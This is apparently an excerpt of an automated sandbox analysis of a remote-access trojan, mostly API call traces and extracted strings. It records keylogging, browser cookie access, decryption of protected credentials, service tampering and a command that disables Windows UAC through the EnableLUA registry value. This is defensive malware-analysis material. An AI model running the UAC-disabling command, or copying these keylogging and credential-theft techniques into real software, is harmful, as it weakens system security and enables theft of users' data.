                                                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __cftoe
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                              • _free.LIBCMT ref: 004482CC
                                                                                              • _free.LIBCMT ref: 004482F4
                                                                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                              • _abort.LIBCMT ref: 00448313
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                              • wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: EventLocalTimewsprintf
                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                              • API String ID: 1497725170-248792730
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >Y
                                                                                              • API String ID: 0-2491313631
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                              • String ID: XQG
                                                                                              • API String ID: 1958988193-3606453820
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                              • String ID: 0$MsgWindowClass
                                                                                              • API String ID: 2877667751-2410386613
                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                              Strings
                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                              • API String ID: 2922976086-4183131282
                                                                                              Strings
                                                                                              • SG, xrefs: 00407715
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 0-643455097
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                              • String ID: KeepAlive | Disabled
                                                                                              • API String ID: 2993684571-305739064
                                                                                              APIs
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                              • String ID: Alarm triggered
                                                                                              • API String ID: 614609389-2816303416
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                              • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                              Strings
                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                              Similarity
                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                              • API String ID: 3024135584-2418719853
                                                                                              APIs
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                              • _free.LIBCMT ref: 0044943D
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00449609
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                              • String ID:
                                                                                              • API String ID: 1286116820-0
                                                                                              APIs
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 4269425633-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                              • __freea.LIBCMT ref: 0045129D
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                              • _free.LIBCMT ref: 0044F43F
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                              • _free.LIBCMT ref: 00448353
                                                                                              • _free.LIBCMT ref: 0044837A
                                                                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00450A54
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00450A66
                                                                                              • _free.LIBCMT ref: 00450A78
                                                                                              • _free.LIBCMT ref: 00450A8A
                                                                                              • _free.LIBCMT ref: 00450A9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00444106
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00444118
                                                                                              • _free.LIBCMT ref: 0044412B
                                                                                              • _free.LIBCMT ref: 0044413C
                                                                                              • _free.LIBCMT ref: 0044414D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                              • _free.LIBCMT ref: 0044E8D5
                                                                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2812119850-3972193922
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountEventTick
                                                                                              • String ID: !D@$NG
                                                                                              • API String ID: 180926312-2721294649
                                                                                              APIs
                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                              • String ID: XQG$NG$PG
                                                                                              • API String ID: 1634807452-3565412412
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                              • _free.LIBCMT ref: 004435E0
                                                                                              • _free.LIBCMT ref: 004435EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                              • String ID: /sort "Visit Time" /stext "$0NG
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00416330
                                                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCreateValue
                                                                                              • String ID: !D@$okmode$PG
                                                                                              APIs
                                                                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                              Strings
                                                                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                              APIs
                                                                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                              Strings
                                                                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                              • String ID: Offline Keylogger Started
                                                                                              APIs
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                              • String ID: Online Keylogger Started
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: CryptUnprotectData$crypt32
                                                                                              APIs
